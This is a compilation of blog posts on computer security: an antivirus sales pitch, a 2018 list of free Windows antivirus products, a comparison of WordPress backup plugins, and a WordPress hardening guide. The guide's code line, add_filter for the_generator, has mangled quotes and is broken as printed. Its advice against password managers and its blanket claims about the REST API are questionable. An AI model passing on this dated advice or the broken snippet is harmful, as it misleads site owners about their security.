Why Antivirus Software Is As Important Today As Ever

Why Antivirus Software Is As Important Today As Ever

I sometimes have to remind myself that things have changed since the ‘90s. In particular, this is true with companies like Microsoft. In my mind, Windows is the same monster it was back then, crashing regularly and frustrating us with blue screens. MS Office is the cumbersome software package that no one on earth can afford. I use a Macbook now, so I don’t have the opportunities to overhaul those associations.

And the same is certainly true with antivirus software. I still struggle to see antivirus software as a relic of the early days of the internet. I expect it to slow down my computer, while only vaguely giving me an idea of what it’s doing.

The cult of Apple doesn’t help. Apple presents itself as the natural evolution of computing, rather than just another brand on the market. They’ve admittedly done an excellent job of keeping virus attacks on their systems to a minimum. In the process, they’ve allowed us to see antivirus software as superfluous at best, harmful at worst.

But these days, going without antivirus software is asking for trouble. Today, it is more important than ever to cover all of your bases.

Antivirus software has evolved

Firstly, it’s important to point out that antivirus software has evolved. It is no longer the drain on the system that it once was. Some of the old names might put you off, so take a look at this TotalAV review to see what a newer alternative can offer.

It’s relatively cheap, simple to use, and doesn’t slow your computer to the point that you wish for a virus in its place.

And you’ll want to consider getting antivirus software immediately if you don’t have it already. The following should convince you why.

International cyber attacks

It’s no secret that certain countries are using cyber attacks to manipulate political systems throughout the world. Even the US president agrees 50% of the time that Russia influenced the election that brought him to power.

They use covert means like spreading fake news over Facebook and influencing opinions using Facebook groups.

But their attacks are not limited to campaigns to influence opinion. They’re increasingly causing chaos by sending out targeted viruses. A cyber virus that first surfaced in Ukraine recently spread throughout the world. While it was, on the surface, an attempt at extortion, it seemed the real reasons behind the attack were more malicious. It appears that the virus was meant to cause chaos, breaking down systems and harming businesses.

The important point to take out of this is that over the next few years, we can expect cyber attacks to only get worse. Rather than hackers causing trouble or making a bit of money, governments are going to be targeting people and businesses for reasons with far more gravity.

Antivirus software is not what it once was, and neither is the threat of viruses. The threat is far greater now, and it is prudent, to say the least, to protect yourself. Go for one of the new names if you feel uncomfortable with the old favorites of the past. It is well worth it.

Best Free Antivirus 2018 for Windows PC

Best Free Antivirus 2018 for Windows PC

We all are familiar with the medical term “virus”, which is a type of infection that can be seen in the human body. Similarly, there are also viruses that affect the computer systems that we use as well. A computer virus is a piece of code that can be injected or programmed into various software’s and other tools that we use on our computers on a daily basis. These computer viruses are malicious codes that when gets into a computer system, can modify the entire settings of your personal computer remotely, thus making your computer respond in random ways or even give some third party access to online hackers as well.

As the years have passed and the innovation on the technology front have reached an advanced phase than ever before, the threats possessed by computer viruses and other potentially harmful threats to your computer system have not decreased. Instead, the intensity of the consequences that such harmful viruses or malware can cause in our daily lives has increased very much.

In today’s world, all our activity is done online, and all of our very sensitive information including our very own personal information, bank account credentials and other official data are saved somewhere or the other over the internet. Therefore, the risks of a potential remote hijack of our sensitive information have also risen.

If you thought that computer virus and other malicious threats that were a headache to computer users a few years back does not make any sense in this modern age of technology, then you are wrong. Popular antivirus service providers such as Symantec and Bitdefender regularly releases an online documentation of the latest threats that can be harmful to your computer system and threats that have been recorded, analyzed and removed by their own antivirus software. Therefore, if you own a computer and does not have antivirus software installed on your system, then the best time to install an antivirus software for your personal, as well as an official computer, is right now!

How Does an Antivirus Software Work?

Ever wondered how antivirus software works?

Well, basically an antivirus software is always running in the background of your computer system, even if not visible to you. When you open a file no matter from within your computer’s hard disk or from an external source, the antivirus software scans the entire contents of the file that you just opened with a huge database of details on the potential virus and other malware threats. In case any of the file that you are currently viewing or just opened matches with the data on the database that contain details on the viruses, you are immediately warned of the same with suggestions on how you keep your computer system clear of any infections or attacks by safely removing those infected files from the system.

Even when your computer is idle, the antivirus software installed on your computer makes scheduled automatic scans throughout the entire computer to find any preexisting virus or other malware that may have escaped the primary scanning by the antivirus software.

Why Should You Not Use a Pirated Antivirus Software?

Well, these features on an antivirus software do come at a cost. And what many among us do is to find some cracked or pirated version of any random antivirus software online, and then download and install it on our computer. Such pirated antivirus software lacks many of the premium virus scans and removes features that only officially recorded purchases have, and many a time, the case is that the infectious piece of virus or malware are ironically attached to such cracked antivirus software that we end up installing on our own computers.

Moreover it is very important that we buy and use only the latest version of the antivirus software which is available out there, and that too only from popular, largely opted and best brands out there so that we get the latest and best type of defense against all the possible threats that may end up harming your computer system.

What Are the Most Important Features that Antivirus Software Must Have?

As mentioned above, all of our lives in today’s worlds are in the online world, and the risks of identity and data thefts that happen online are at its maximum nowadays. Hence it is more important for the latest antivirus software’s to provide safety from online data and identity thefts that may happen to anyone.

There are many features that the latest antivirus software provides its users with. However, if you are unaware of what the latest antivirus software must have in order to protect your computer from any kinds of harmful attacks, then below are some of the features that you must make sure that the latest antivirus software that you are about to buy has.

  • Malware Protection:
    The first and the most basic feature that any kind of antivirus protection that you buy is protection from malware that can infect your computer system. In current times, malware protection is not just limited to virus protection but also protection from other threats such as Spywares, Adware, Trojans etc.
  • Complete Protection for your Online Activities:
    Nowadays, potential threats to your data or computer do not appear in the form of some software. Rather these harmful codes are injected to the various websites and other online pages that you may visit intentionally or not. Hence it is also important that if you are planning to buy antivirus in 2018, it has a complete protection over all the activities that happen within the web browser on your computer. Latest antivirus software in 2018 should also be able to protect you from any kind of phishing activities as well.
  • Consumer Awareness on the Latest Threats Out There:
    Unlike in older times, when there was a limit on what you could actually do with a computer system. Just protection against potential harms and threats out there is not enough today. The antivirus software 2018 version that you are about to purchase today must also be able to send you regular awareness on what the latest forms of security and data threats are out there along with details on how you can stay protected from any of these attacks that may compromise your identity or any secure information that you may possess.

Best Free Antivirus 2018 for Windows PC

If you are currently using a PC powered by the Windows operating system, and if you are confused on whether the free antivirus software options that are available these days are of any use, then do not worry. You are not the only one with this question in mind and in fact we have been receiving a lot of queries on the free antivirus 2018 software available for Windows PC out there and also to suggest some of the best free antivirus software for Windows PC in 2018.

Among all the free antivirus software’s available online for free that supports the Windows operating system, there is some really functional and user-friendly antivirus software that can really help you protect yourself against any kind of threats that can harm and compromise the security of your computer.

So taking all the queries into consideration, today we are here with a detailed list of the best free antivirus 2018 software’s that are available for the Windows operating system currently.

1. AVG Free Antivirus for 2018:

The AVG Antivirus is one of the best free antivirus software you can find for the Windows operating system in 2018. The antivirus solution from AVG has been making it to the best free antivirus list from almost every publisher out there for many years now.

One of the main reasons that make the AVG antivirus so popular is that it is being used and trusted by millions of users around the globe. And not just their user statistics, the features and functionality provided by the AVG antivirus also prove why they are often crowned the best antivirus solution available.

As said above, an antivirus software should have much more in today’s time than just virus protection in order to make it the best in the world. Well, apart from regular virus protection, the AVG antivirus software also gives you separately downloadable add-ons that will offer you features such as Email and Web Browser monitor clients, so that you need not waste the disk space on your computer by having these features, in case you already have a better client doing the same functionality for you.

Compared to the previous versions of the AVG antivirus software, what makes the latest AVG antivirus 2018 better is that even though you got regular antivirus updates within the previous versions, a change to the latest set of features offered by AVG would require you to uninstall the current version that you are using and install the latest antivirus version from AVG.

However, in the latest version, that is the 2018 version of AVG free antivirus software, you always have the most updated and latest version of the AVG antivirus software, no matter in terms of updated protection or updated set of features. Apart from that, the new 2018 AVG antivirus software has an updated user interface that makes it quite easier compared to previous versions to scan your computer for threats such as malware and unwanted browser toolbars or extensions, hidden files. And the latest 2018 release of AVG antivirus also lets you block unsafe or infected file downloads even before you try downloading them to your computer.

Download Now: http://www.avg.com/in-en/free-antivirus-download

2. Avira Antivirus Free 2018

The latest 2018 free antivirus software option from Avira is yet another globally popular free antivirus software currently. Avira is developed by a German-based lab and has an experience of protecting computers and other devices from all kind of potential threats out there for over 30 years now. Avira claims to be detecting and handling about 30 million threats on a daily basis. And the popularity of the Avira antivirus is quite clear, thanks to the over 100 million active users that Avira has globally. To take the free security services offered by Avira to a whole new level, they are now introducing what is claimed to be the first ever complete suite of security services for free.

The latest free Avira antivirus software 2018 includes advanced features such as protection against ransomware, which is a data hostage type of malware that Avira says is the most growing malware out there currently. The latest Avira antivirus 2018 suite edition also lets you keep your system optimized by fixing issues on your computer’s memory management, for maximum performance. Apart from the set of features that you will be enjoying on downloading the latest Avira antivirus suite 2018, Avira also ensures that you will also be among the first customers to receive any future updates in terms of security and features that they will roll out for free.

Another cool feature of the latest Avira antivirus suite 2018 is that it also helps you block any kind of surveillance on your online activity by masking your IP address using the Avira Phantom VPN service. This will help you access websites that are restricted in your country, or simply block advertisement agencies from accessing your location data. However, the bandwidth for the Avira Phantom VPN service in the free suite is limited to 500MB per month.

Download Now: https://package.avira.com/package/oeavira/win/int/avira_en_fass0_58907ab807b88__ws.exe

3. Avast Free Antivirus 2018

Easily one of the top 3 contenders that can be called the best antivirus software available out there. The Avast antivirus free 2018 software is also one among the most trusted antivirus client for the Windows operating system.
What makes the Avast antivirus quite popular out there is that the antivirus client from Avast is quite lightweight when compared to other antivirus software’s, thus saving up disk space and resources of your computer. Avast has also been awarded the antivirus with the least impact on the performance of your computer. In the latest 2018 free version of the Avast antivirus, they have introduced the Nitro update which moves much of the malware analysis into the cloud, thus making the Avast Antivirus 2018 free software even lighter in terms of storage space and more efficient in terms of overall performance. The latest CyberCapture feature takes notice of an unknown type of files that you may come across while you are online browsing and then sends it to the Avast labs for real-time analysis.

IoT or Internet of Things is the latest technology advancement out there and potentially the most dangerous one for any kind of malicious attacks as well. Well, with the latest free 2018 antivirus software, Avast has you covered with all the smart electronics that you have in your home connected to the same home network.

Other features of the latest Avast antivirus 2018 edition include improved and more sophisticated malware protection along with protection on all your browser activities. It also lets you clean all the unwanted browser extensions and toolbars that may be affecting the performance of your web browser or compromising your online privacy.

Download Now: https://www.avast.com/en-in/download-thank-you.php?product=FAV-ONLINE&locale=en-in

4. Panda Antivirus Free 2018

Yet another top-rated antivirus solution out there is the Panda Antivirus software. What makes the Panda antivirus software one of the best free antivirus software out there is that it is quite light. Similar to the Avast Antivirus software mentioned above, Panda also has most of its work saved in the cloud storage so as to take the load off your computer hard drive. This helps to free up the resources of your computer and thus keeping the performance of your computer at level best, compared to the other antivirus software available out there.

The Panda antivirus software solution also offers updated and most cutting-edge security against all kinds of malware attacks and threats that your computer may come across. And the most salient feature of the Panda antivirus being that all the updates to the antivirus software happen seamlessly in the background without making you notice or bothering you off what you are doing.

Download: http://download.pandasecurity.com/thankyou/index.php?productID=FREEAV&interstitial=1&_ga=1.192375277.652863504.1485866159

5. Bitdefender Free Antivirus 2018

Last but not the least is the Bitdefender antivirus solution. Bitdefender is not at all behind all the other top-level free antivirus solutions that have been mentioned above. The Bitdefender free antivirus 2018 for Windows operating system is specially designed to take a lighter toll on your system resources as to give you better performance.

The Bitdefender antivirus solution has one of the best protection and defense protocols against active threats such as phishing, viruses and other malware. Their regularly updated databases make sure that none of the malware that may possess threats to your computer system goes unnoticed.

Yet another important feature of the Bitdefender antivirus 2018 free edition is its online fraud detection. The anti-fraud system within the Bitdefender antivirus software 2018 provides you with real-time warnings whenever you are visiting a scam website, thus keeping you protected from any kinds of online fraud activities.

Download: https://www.bitdefender.com/solutions/free/thank-you.html

Final Words:

Well, that was a comprehensive and well-detailed guide that covered some very important topics such as how does antivirus software work, the importance of antivirus software solutions in 2018 and what are some of the best free antivirus software of 2018 for the Windows operating system out there. We have tried to feature all the latest and very best of the free antivirus solutions out there from all the popular antivirus developers around the globe. In case we missed out on any of your favorite free antivirus software in 2018 for the Windows operating system, then please do mention them in the email address mentioned below.

Best wordpress backup plugin

Best wordpress backup plugin

One of the main security tip for WordPress site is Back up your site regularly. No matter how secure your website is, there is always room for improvements. But at the end of the day, keeping an off-site backup somewhere is perhaps the best antidote no matter what happens. If you have a backup, you can always restore your WordPress website to a working state any time you want.  And the time is the most important thing, people don’t like then websites is down!



Today we will compare several most popular wordpress backup plugins. We selected 5 best WordPress backup plugins on the market. We’re talking their pros, cons, main features, pricing, and why and when you would want to use them.

Let’s start with the basics. Here’s the side-by-side:

VaultPress BlogVault BackupBuddy CodeGuard UpdraftPlus
vaultpress blogvault backupbuddy codeguard updraftplus
Price / m $3.50
$9.00
$29.00
$9.00
$19.00
$39.00
$7.00
$8.00
$12.00
$5.00
$39.00
$79.00
$119
$239
$0
$7.00
$9.75
$15.00
Databse backups Y Y Y Y Y
Filesystem backups Y Y Y Y Y
Automated/scheduled backups Y Y Y Y Y
Manual backups Y Y Y Y Y
Easy restoration features Y Y Y Y Y
Security scans/monitoring Y N Y Y N
Site migration features Y Y Y N Y
Backup history Y Y Y Y Y
Backup encryption N Y N Y Y
Off-site backup storage Y Y Y Y Y
Storage for your backups ? not limit for fair usage 1GB 5GB 1GB
Customer support Y Y Y Y N*
Price 8 9 10 7 10
Ease of use 9 10 9 10 8
Features 9 9 9 9 9
Support 10 10 10 10 9
 OVERALL   9.0   9.5   9.5   9.0   9.0 
VISIT

* no support for the free version
** after the changes in business model, VaultPress features delivered via Jetpack


Guide to wordpress security

Guide to wordpress security

Roughly 30,000 websites are hacked every day. Could your website become one of them? In a perfect world, using a popular content management system like WordPress would end many security woes — but unfortunately, that’s not the case. By default WordPress isn’t very well secured; it’s built to easily publish content, not necessarily to protect it. If you want to protect your content as blogger, you’re going to need to take some extra steps.

But becoming a blogger shouldn’t mean that you have to be some sort of technical savant. You’re a content producer, not a hacker. Because of that, we’ve compiled a complete, all-in-one guide to “hardening” and protecting your WordPress blog. And it’s a little long — but most of the steps that you’re going to have to take are only going to have to be taken once.

By the end of this guide, you’ll know absolutely everything there is to know about WordPress safety and security, from better password habits to modifying the default WordPress configuration files. Whether you’re setting up a one man show or creating an immense magazine of content, you’ll be able to rest assured that your data, your site, and even your users are protected.

But first… let’s talk about the risks.

Why Do I Have to Secure My WordPress Account?

It’s a blog — not a bank account! Why would anyone try to hack your site? It’s easy to assume that your one blog isn’t going to become the target of a serious attack but, in truth, there are more reasons for a cybercriminal to target you than you might think. WordPress blogs are frequently hacked for the following reasons:

  • To collect your personal information — or the information of your users. Identity theft is a big reason why a cybercriminal might go after a well-trafficked blog. You don’t even need to collect a lot of information to make this viable: the criminals may only be seeking to collect email addresses. They can sell active email addresses to advertising companies or use them as their own spamming lists.
  • To post “black hat SEO” web pages. If your website is currently a highly ranked website (or even a moderately ranked one), a cybercriminal may want to take over your website domain so that they can post their own content on it. This is very similar to domain hijacking and it’s designed to leverage the popularity of a existing website in order to sell goods and services, spread malicious programs, or point to affiliate advertising.
  • To steal your website and hold it for ransom. Yes, this happens. And it’s usually not obvious. No one jumps out at you from a digital alley and says “$30 or the website gets it!” Instead, they throw a splash page on your website that says that it’s been hacked, and then direct you to services that you can purchase that will restore your website… all under the guise of “helping” you from the evil cyber criminals. This works because many people don’t back up their websites, so they can’t restore their content themselves.
  • To embed malware and malvertising. Some people just want to watch the world burn. A cybercriminal can pull off a rather subtle attack by simply embedding malware and malvertising into your website. Your website will still be up — so you may not notice that it is currently distributing malicious programs to your users (likely including yourself). Eventually, however, search engines are going to notice and your website is going to be blacklisted.
  • To simply take your website down. DDoS attacks are one of the easiest ways that a cyber-attacker can take a website down. This can happen for a variety of reasons: the attacker may be a competitor, the attacker may disagree with your positions, or the attacker may be trying to use it to gain access to your website by exposing other vulnerabilities.

Apart from this, your website can also be targeted as part of a larger attack. Criminal attackers may simply be scanning for vulnerable WordPress accounts — because they already know about the vulnerabilities that exist in WordPress. They may simply attempt exploits on all of the websites they find, hoping to recover something of usefulness and interest.

So how do you avoid becoming a target? It all begins with the setup.


Chapter One: Setting Up and Configuring Your WordPress Installation

WordPress is in the business of making it easy for you to post your thoughts and experiences. It isn’t necessarily in the business of securing them. The default configuration of your WordPress installation makes it very easy for you to use, but it also makes it easier for others to access. Before you even begin fiddling with your first post, you need to change some settings.

Change Your Administrative Username

By default, WordPress sets your username to “admin.” This is a problem: in order to log in, someone only needs to guess your password. But you can defeat this by having a username that is different and that is not visible to the public.

In WordPress, you can’t directly change usernames; instead, you have to create a new username and delete the old one before you begin. That makes it a little more complicated, but this is as good a time as any to become familiar with the administrative settings dashboard.

How to Change Your Administrative Username

On the administrative dashboard, click on “Users.” You’ll retrieve a list of current users, which should be only a single user named “admin.”

Next to the Users heading, click on the “Add New” button.

Fill in your user information as directed and select the role of “Administrator.” Click on “Add New User.”

Hover on the old “admin” user name. Click on “Delete.”

Confirm deletion.

Click on your new administrator name.

Scroll down to change the nickname and select to “display name publicly as” this nickname.

Add Two-Factor Authentication

Two-factor authentication adds an additional layer of security upon a traditional username and password combination. Think of two-step authentication as a lock in which you have to turn two separate keys. One of these keys is your login credentials — your username and password. The other key can be either of the two following options:

  • “Something you are.” A fingerprint scan, eye scan, or other biometric service can be used to verify that a user is who they say they are. This is frequently used to lock phones, doors, and other physical devices.
  • “Something you have.” A smartphone or similar device can be used to verify a user’s identity. Frequently this means sending the user an SMS message with a PIN. The user then has to enter that PIN alongside their login credentials.

Two-factor authentication can only be setup natively on WordPress.com. Otherwise it requires the use of plug-ins such as MiniOrange 2FA, Google Authenticator and Sucuri.

Installing Two-Factor Authentication With Google Authenticator

Go to Add Plug-Ins and select “Add New.”

Search for “MiniOrange Google.”

Click “Install” and then “Activate.”

MiniOrange will send you an email to verify your email.

Then, you can set up your account.

Select the 2fa Tab to select a type of two-factor authentication. The simplest and most secure method is Google Authenticator. MiniOrange also offers premium versions including SMS, as well as less secure via email.

Click on the alert to configure security questions, which will ensure that you do not get locked out of your account.

(Optional) You can also setup which roles have two factor authentication.

WARNING! Using WordPress’s optional Jetpack, it’s possible to connect your own WordPress website to your WordPress.com login. From then on, you can log into all of your WordPress sites through your WordPress.com credentials. This is not advised. If one of your sites is compromised, all of your sites will be compromised.

Install a CAPTCHA Solution

Everyone knows CAPTCHA. CAPTCHA prevents bots from performing actions on your site, such as trying to log in or trying to submit a form. A bot can be very persistent: not only can they eventually break through your security, but they could overly tax your website, resulting in denied traffic and slow connections.

Though some CAPTCHA systems can seem a bit “annoying” — such as the ones that are difficult to read — they can be essential for high volume blogs. The CAPTCHA WordPress Plugin lets you add CAPTCHA controls to login forms, registration forms, comments forms, contact forms, and more. Further, you can control the type of CAPTCHA code that’s displayed, so that it has limited impact on your legitimate users.​​

Installing a CAPTCHA Solution

Go to Add-Plugins and Select “Add New.”

Search for “Captcha by BestWebSoft.”

Click on “Install.”

Review Captcha Settings. Enable Captcha for login forms, registration forms, forgot password forms, and comment forms.

Save changes.

From now on, when you login, you’ll be greeted with a captcha code.

Get Spam Protection for Your Comments

At first glance, spam protection seems more like a usability issue than a security issue. “Spam” comments generally come from bots who are seeking to boost the website rankings of other websites. Bots will generate “word salad” comments that have nothing to do with your posts but ultimately link to the site that they are promoting.

​Where it becomes a security issue is two-fold: spam comments can bog your blog down with excess traffic and they can contain potentially malicious links. WordPress does not have built-in spam protection, but it is provided for free through the Akismet WordPress plug-in. There are also some other options, such as the official WordPress security plug-in, and all-in-one systems like Sucuri.

Installing the Akismet WordPress Plug-In

Go to Add Plug-Ins and select “New.”

Search for “Akismet.”

Install and activate the Akismet plug-in.

Click on “Set Up Your Akismet Account.”

Click on any of the options.

Get an Akismet API Key for free.

Go to the Akismet Settings and enter in the Akismet API Key. Spam protection will begin instantly.

Remove Your WordPress Version Number

WordPress telegraphs the version number that you have installed for the world to see. While this might be interesting information, it can also be harmful. A malicious user could see that you’re using a version of WordPress that still has a certain vulnerability — and they can then target you. The easy solution? Just remove the number.

This takes a bit of editing, so remember to backup your website first. Once your website has been backed up:

Go to “Appearance” and then “Editor.”

Go to the right and click on “Theme Functions” (also labeled “functions.php”).

Note that some more advanced themes may have a custom functions file. Consult your theme documentation for more details.​

Type “add_filter(‘the_generator’,”);

This is WordPress Code that adds a filter to the part of the WordPress library that displays your version, thereby preventing it from being displayed.

Click on “Update File.”

This will strip out your version number from your WordPress header and from your WordPress RSS feeds at the same time. Now you just have a few more adjustments to do.

Disable the WordPress API

WordPress offers a REST API for developers who want to integrate their own programs into WordPress. However, there are some issues with the REST API — most notably that the REST API can actually bypass WordPress’s authentication system, including two-factor authentication. Unless you are using it for a custom-built application, it’s a solid practice to simply disable the WordPress API entirely. This can be done through a plug-in, such as Disable REST API.

All you need to do is “Install Now” and then “Activate.”​

Disable XML-RPC

XML-RPC is a special WordPress feature that enables remote access and posting. This can be a security issue, as it creates another way that a malicious user could potentially access your site. If you’re interested in publishing posts remotely, you may need to leave XML-RPC enabled (it is enabled by default). If you are not publishing posts remotely, there’s no way to add an additional vulnerability.

The easiest way to disable XML-RPC is to install the Disable XML-RPC plug-in. Though there are other ways, it would require modifying the code of a different plug-in.

Again, all you need to do is click on “Install Now” and then “Activate.”


Chapter Two: Passwords and Password Hygiene

So far many of the changes that we have made have been designed to counter security issues in the WordPress platform itself. But the platform only represents half of the risk. An equal amount of risk comes from the user — and, unfortunately, that’s you. There are many ways you could potentially (and accidentally) create your own security vulnerabilities. One of the major ways lies in passwords.

As of the most recent versions, WordPress Core actually requires “strong” passwords by default. That means that WordPress won’t let you set a password that its own algorithm deems too weak — and that’s a good thing. But there are still some things you should know about how passwords protect you, and how you can protect them.

Crafting a Strong and Memorable Password​

What makes a password good? A good password is both complex and easy to memorize. WordPress will make sure that your password is complex, but the passwords that it automatically generates are most definitely not easy to memorize — in fact, they’re generally impossible to remember. That can lead to people foregoing the automatically generated passwords altogether and attempting to make their own.

Complexity is important because the more complicated your password is, the less likely it is to be guessed by an intruder. But memorization is also important; if you can’t remember your password, you’re more likely to save it in an app, write it down in your notepad, or simply reset it the first time you forget what it is.​

Most people do not choose good passwords. To understand what makes a good password, let’s use an example:

  • “shells” – This is an obviously bad password. It’s a single dictionary word. It can easily be guessed, especially if there’s some reason for choosing the word shells. And you might think “what person is going to guess ‘shells’?” But people are rarely used for this process. Instead, automated scripts are used to go through an entire dictionary worth of words to eventually find the right one.
  • “sh311s” – This is often considered to be a good password, but it really isn’t. It’s not long enough, and the complexity is simply confusing — you’ll find yourself wondering whether you used an ‘e’ or a ‘3’. To a computer, “shells” and “sh311s” are functionally identical.
  • “#Sh@*zHQWoa*” – This is the type of password that’s usually provided through auto generation. In practice, it can be useless; it’s only helpful if saved in a password manager, which opens the door to other security issues entirely.
  • “She_sells_sea_shells.” – This is actually the best password on this list (well, assuming it wasn’t part of a very popular nursery rhyme). It is long, complex, and easy to remember.​

Complexity doesn’t mean that your p4ssw0rD has to look complex to you; this is a common misunderstanding. Instead, complexity goes up exponentially by length — and longer pass “phrases” are generally easier to remember and impossible to easily guess.

Practicing Good Password Hygiene​

Every morning you probably brush your teeth, floss, and wash your face — though may not in that order. But just as you need to practice good physical hygiene, you also need to practice something called good password hygiene. In IT, good password hygiene means maintaining your passwords properly… and making sure they aren’t unnecessarily exposed to risk. Password hygiene is called hygiene because it requires the development of good habits.

  • Always memorize your passwords. In the prior section, we discussed why making passwords memorable is important. Even if you have to use some sort of mnemonic device, passwords should always be committed directly to your memory.
  • Never save your passwords in plain text. If your passwords are saved somewhere on your computer, such as in a notepad on your computer’s desktop, anyone will be able to view it and log into your WordPress account. This also goes for post-it notes on physical desk tops.
  • Don’t give out your passwords to others. Though you may trust someone, that doesn’t necessarily mean that their password hygiene is up to snuff. When you give out a password, you run the risk that someone else might lose that password.

Remember: passwords are the first line of defense you have when securing your WordPress account. Though they aren’t the only security you should rely upon, a well-crafted and well maintained password can do much of the heavy lifting in terms of your system security.

Making Sure Your Password Can’t Be Reset

…At least, not without your knowledge. One substantial security risk involving passwords is the ability to reset a password. Other user accounts can be particularly bad about this; a malicious user might be able to reset your password simply by knowing a little about you, such as your birth date. WordPress requires that you have access to your administrative email account to reset your password. And that also means that your security is only as good as your email security.

WARNING! Anyone who has access to your email account can easily find a way to access your WordPress account — and can lock you out of both. Just as it’s important not to share your WordPress login information, it’s also important not to let anyone use your email account.

Locking Out Multiple Sign On Attempts

WordPress does not have built-in functionality for locking out multiple sign-in attempts. And that means that a persistent individual can sit there virtually all day just trying different username and password combinations. A login limiting plug-in will limit a user to a certain number of tries during a certain amount of time — such as three tries every hour. It can also permanently lock down a system (until properly unlocked) if a certain number of incorrect attempts are made. This can be achieved through the installation of a single-use plug-in such as WP Limit Login or a more comprehensive security solution such as Sucuri.

Installing WP Limit Login Attempts

Install and activate WP Limit Login Attempts, and then modify your settings:

  • Number of login attempts: the number of attempts allowed before locked down initiates.
  • Lockdown time in minutes: the amount of minutes the user will be locked out for.
  • Number of attempts for captcha: when a captcha will engage to prevent bot attempts.
  • Enable captcha: whether you want to add a captcha at all.

YOU SHOULD KNOW: At any time, you can go to your plug-ins in the administrative dashboard and select “deactivate.” If your blog appears to be acting strangely or loading slowly, you may want to deactivate plug-ins one by one to determine which plug-in might be the culprit. Incorrect settings could lead to performance issues later on.


Chapter Three: Adding an Internal Monitoring System

Up to now, you may have noticed that securing WordPress involves a lot of small changes, management, and maintenance. You can bolster the overall security of WordPress through the use of an internal security monitoring system, which will actually make many of these changes on your behalf. Wordfence and Sucuri are two of the most popular management systems; though WordPress offers an official security plug-in, its uses are fairly limited.

Monitoring Security with Sucuri

Offering “complete website security,” Sucuri is able to both clean previously hacked websites and protect websites from attacks.

Sucuri is the leading commercial option for all-in-one WordPress security. For SMBs and professionals, Sucuri is likely one of the better options — it comes with a wealth of robust features that both protect your website while also reducing the amount of time you need to spend on setup and administration. Some of the most prominent features of Sucuri include:

  • Site Cleaning. If you’ve already been hacked, Sucuri can restore your website and clean up any malicious infections. These features include the ability to reset the password of any user, reset existing plug-ins, and trace back potentially malicious activity.
  • Site Reputation. If your site has already been blacklisted by Google or disabled by its host, Sucuri can detect this and help you become reestablished.
  • Site Protection. If you want to protect yourself from being hacked, Sucuri offers DDoS and brute force protection, in addition to protection against many current security exploits and vulnerabilities.
  • SSL Certificates. Sucuri provides SSL certificates for their customers under their professional plans. SSL certificates make it possible to encrypt and protect your blog’s transmitted data.
  • Advanced Website Protection. Sucuri scans, detects, and mitigates attacks against websites through their Website Application Firewall, including DDoS attacks and brute force password attacks.
  • Scanning and Monitoring. Sucuri actively scans websites for signs that they may have been attacked, such as through malware or malvertising.
  • Site Hardening. Sucuri additionally makes many changes to improve WordPress’s overall security, such as: updating WordPress and PHP, removing the visible WordPress version, protecting the uploads directory, restricting access to internal directories, updating and using security keys, and checking for information leakage.

Sucuri is a comprehensive security plug-in that can be installed for free. To install Sucuri, download the “Sucuri WP Plugin.”

Click on “Sucuri” in your new administrative panel. Sucuri will first ensure that WordPress has not been modified in any way.

It will also make sure that the site is clean and it is not blacklisted.

Before going further, you will need to generate an API key. This will enable firewall protection. Simply provide your domain and email address to get started.

Once the API key is generated, you’re free to go through the Sucuri WP plug-in settings, which are comprehensive.

  • Scanner. This system looks for changes that have been made to your WordPress installation. If you are experiencing issues with WordPress, you can consult with the scanner to find out more.
  • Hardening. This feature goes over many of the changes that we have made and more, allowing you to automatically do things such as: werify your PHP version, delete the default administrative account, and block PHP files in the wp-includes directory.
  • Post-Hack. Secret security keys can be used to improve upon your security and authentication, and any user passwords can be reset, in addition to any installed plug-ins.
  • Alerts. Here you’ll be able to control where security alerts go – generally to your administrative email account.
  • API Service Communication. Your API key and its details are stored here – there shouldn’t be any changes that you need to make.
  • Website Info. This contains all of the credentials and other information related to your website.

Monitoring Security with Wordfence

Wordfence is the leading “freemium” plug-in for all-in-one WordPress security, with a large inventory of free features in addition to paid options.

Accessible and affordable, Wordfence presently has millions of users across the globe. Wordfence provides firewall, malware scanning, and login security services, all designed to build on top of WordPress Core. Even the free version of the plug-in is relatively feature complete. Some notable features include:

  • Web Application Firewall. The Wordfence Web Application Firewall detects attacks such as SQL injections, malicious file uploads, and DDoS attempts.
  • Website Scanning. Wordfence can provide hardening for your website by detecting problems in its public configuration, backups, posts, comments, and passwords.

There are also some premium features available:

  • Protection against spam. Wordfence can check comments against lists of known spammers, in order to better detect and remove spam. This feature takes the place of plug-ins such as Akismet.
  • Protection against blacklisting. Wordfence can additionally check to see if your website may be getting spammed to other sites. This is a commonly used tactic to get a website blacklisted; if Google sees your website being used in this fashion, it may remove you from search engine results.
  • Rate limiting. Wordfence can limit high volume traffic to a certain rate, so that users such as bots can still access the site, but without interfering with its responsiveness. This can be especially useful to limit crawlers — bots that look through websites to index them for search engines.

Wordfence can adversely impact the performance of high traffic sites — but caching and better performance optimization can also be used to address this. In recent iterations, Wordfence has addressed and reduced its usage of overhead.

Monitoring Security with WordPress Security

WordPress officially provides some advanced security features through its WordPress Security plug-in — but the features provided are fairly rudimentary and shouldn’t be relied upon to secure an entire site.

You can obtain some basic security features through the use of Jetpack Personal or Jetpack Business, both of which include the official WordPress Security Plug-In. WordPress Security includes spam filtering, technical support, daily off-site backups, and one-click restoration. But it is not designed to monitor and protect against advanced threats. WordPress security is mostly designed to quickly deploy backups of your system in the event that something goes wrong. It can be very useful in the event that your website is hacked or that an employee makes a mistake that damages your site, but it is mostly responsive rather than preventative.


Chapter Four: Securing Your Web Hosting Account

Unless you are hosted directly on WordPress.com, your WordPress site is going to run on top of a hosting account. And that means that your hosting services are going to have to be just as secure as your WordPress installation. By gaining access to your web hosting account, an attacker can do anything they want — including deleting your website entirely.

Finding the Right Hosting Service

First thing’s first — you usually want to work with a hosting service that is either experienced with WordPress or specifically targeted towards WordPress bloggers. Not only will their server environments be well-suited to the needs of WordPress, but they will also be able to provide better security tailored around the system.

There are thousands upon thousands of hosting services available, and though they may seem to be identical, some of them are far safer than others. When looking for a web host, you should consider the following:

  • Are they popular? Major web hosting services such as HostGator, DreamHost, and GoDaddy all have to have top-of-the-line security solutions because of the sheer number of clients that they have available. That doesn’t necessarily mean they are the best hosts (many of them have fairly limited resources), but they are more likely to be secure than other low cost services.
  • Is the account shared? Shared hosting packages may have additional security vulnerabilities, as multiple clients are in the same server environment. Most bloggers will not want to spend the money for a dedicated server, but they can still invest in a VPS (virtual private server) to reduce their risk.
  • Do they have built-in security features? A reputable hosting service will discuss the security features the offer, such as complimentary SSL certificates, automated backups, and firewalls.

As with many things, you don’t want to go with the most affordable hosting service. Look for a good blend of features and reputation; there are many very cost-effective options that aren’t necessarily bottom tier.
